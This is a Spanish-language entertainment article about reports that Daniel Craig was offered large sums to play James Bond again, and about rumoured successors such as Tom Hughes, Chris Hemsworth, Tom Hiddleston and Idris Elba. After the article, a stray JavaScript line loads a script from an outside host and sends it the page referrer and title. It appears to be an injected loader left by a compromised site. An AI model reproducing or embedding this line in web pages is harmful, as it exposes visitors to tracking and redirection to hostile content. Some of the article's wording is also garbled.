¿Daniel Craig de nuevo el 007?

A muchos de nosotros nos gustaría la idea de jugar a ser James Bond, pero seguramente a muchos nos encantaría más la propuesta de que por esto nos pagaran $150 millones.

Pero claro está que la estrella de Hollywood Daniel Craig no es como la mayoría de la gente.

El actor de 007, a sus 48 años, ha jugado a ser el espía desde el año 2005, y ha participado en cuatro películas. Especto, fue la última donde aseguraría su participación, pero según informes recientes, se le ha ofrecido una fuerte suma económica para volver a la franquicia y realizar dos películas más. Como sabemos Craig ha hecho ningún secreto de su renuencia al famoso esmoquin, pero nunca digas nunca.

“El estudio que llevará a cabo esta filmación está desesperado por asegurar los servicios del actor”, dijo una fuente muy cercana a Craig.

Desde el 2016 Daniel ha rechazado distintas ofertas para las siguientes filmaciones. Una de estas propuestas llegó a la suma de 68 millones de libras.

“Todo el mundo sabe lo mucho que los ejecutivos lo adoran, y la idea de perderlo en un momento tan crucial en la franquicia no es una opción” comentó un portavoz de los estudios. Y esto nos queda claro ya que las cantidades para atraer al espía favorito son cada vez más grandes.

Mientras Daniel decide si se unirá o no al elenco, han existido constantes rumores sobre quién podría reemplazarlo como Bond.

Algunos de los últimos contendientes nombran el actor Tom Hughes, que supuestamente ha impresionado productor Barbara Broccoli, y las estrellas de Marvel Chris Hemsworth y Tom Hiddleston.

A pesar de afirmar que es demasiado viejo para el papel, Idris Elba sigue siendo una opción popular entre los fans de Bond.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios